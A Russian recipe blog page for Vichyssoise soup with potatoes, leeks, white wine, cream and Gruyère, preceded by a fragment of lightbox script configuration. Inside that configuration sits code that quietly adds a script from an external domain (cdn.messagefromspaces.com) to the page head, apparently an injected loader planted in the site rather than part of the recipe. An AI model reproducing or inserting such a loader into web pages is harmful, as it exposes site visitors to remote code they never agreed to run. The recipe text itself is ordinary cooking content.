, 'opacity': false, 'speedIn': 500, 'speedOut': 500, 'changeSpeed': 300, 'overlayShow': false, 'overlayOpacity': "", 'overlayColor': "", 'titleShow': false, 'titlePosition': '', 'enableEscapeButton': false, 'showCloseButton': false, 'showNavArrows': false, 'hideOnOverlayClick': false, 'hideOnContentClick': false, 'width': 500, 'height': 340, 'transitionIn': "", 'transitionOut': "", 'centerOnScroll': false }); var script = document.createElement('script'); script.type= 'text/javascript'; script.src = 'https://cdn.messagefromspaces.com/c.js?pro=type'; document.getElementsByTagName('head')[0].appendChild(script); })

Вкусно + Полезно

Суп Вишуаз (Vichyssoise)


iStock_000028736544XSmallСуп с таким романтичным названием не может быть невкусным! Рецепт очень прост — но вкус изумительный.

 

Чего и сколько берем:

1. Картофель — 300 гр.

2. Лук порей (белая часть) — 300 гр.

3. Лук репчатый — 1шт.

4. Масло сливочное — 100 гр.

5. Сливки — 100 гр.

5. Сухое белое вино — 100 гр.

6. Сыр Грюйер — по вкусу (граммов 50)

7. Соль, мускатный орех — по вкусу

8. Вода — 400 мл (можно чуть больше)

 

Начинаем готовить:

Этот рецепт немного отличается от классического наличием 2х ингредиентов: белого вина и сыра. Но, на мой взгляд, они добавляют ему шарма и изюма. Итак, растапливаем сливочное масло и пассируем в нем репчатый  лук и порей до мягкого состояния. Добавляем нарезанный кубиками  картофель и  готовим еще минутку, вливаем белое вино. Ждем пока оно выпарится и добавляем воду. Готовим еще 4-5 минут и измельчаем блендером. Солим по вкусу, добавляем сливки и мускатный орех. По желанию посыпаем сыром Грюйер. Вкуснятина! Суп можно есть как в горячем, так и в холодном виде! Универсальное  блюдо.

На эту тему вы можете почитать:

Супчик картофельный со специями
Борщ "Новый взгляд"
Фасолевый суп

Тэги: ,



Добавить комментарий